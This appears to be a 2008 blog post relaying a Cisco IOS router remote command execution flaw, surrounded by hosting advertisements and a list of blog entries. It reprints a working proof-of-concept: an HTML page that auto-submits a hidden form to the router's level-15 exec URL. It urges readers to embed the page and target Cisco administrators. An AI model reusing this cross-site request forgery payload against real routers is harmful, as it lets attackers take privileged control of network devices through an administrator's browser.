Search for
Login | Username Password Forgot? | Email: | Create Account
» DreamHost is the hands-down-best shared web host of all time (Since 1997).
Unlimited domains, bandwidth and disk space! Full-featured hosting and support for just $8.95/mo!
» Web Host & Business Opportunity
* cPanel® control panel
* Opt-in email friendly (25k/day)
* Earn $10/mo per referral!
* Paid directly to PayPal
Hacking / Malware / Spam | Popularity: 1 | Entries: 54 | Modified: 520d 19h ago | | Add to My Feeds
Cisco 0day ReleasedSeptember 21st, 2008

taken from http://jbrownsec.blogspot.com/ he has release the 0day cisco router Remote Command Execution.

An attacker can execute ANY command on the router with level 15 (root, same as enable) privileges (usually level 15 user by default) by getting a target user (administrator or etc) to view a web page that has the exploit embedded. The exploits can be modified to, on loading of the page with the exploits embedded, to execute both exec and configure commands on the Cisco router. These exploits have been tested on a Cisco 871 router running IOS 12.4 but are assumed to work universally on any router configured to use the HTTP interface.

you can see the example and POC at milw0rm.com . jbrown said that this one is doesn’t look easy to fix and is moderately critical to cisco administrators.this is the POC.Replace “10.10.10.1″ with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin’s + Safari are the best targets ;) 

<html>
<body>
<body onload="asdf.submit();">
<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">
<input type=hidden name=command value="show privilege">
<input type=hidden name=command_url value="/level/15/exec/-">
</body>
</html>

More from BackTrack [Box]

hacking literatur 08 Oct 13
ClickJacking Idea 08 Oct 9
sql truncate 08 Sep 23
Hello world! 08 Sep 21
Cisco 0day Released 08 Sep 21

^ Back To Top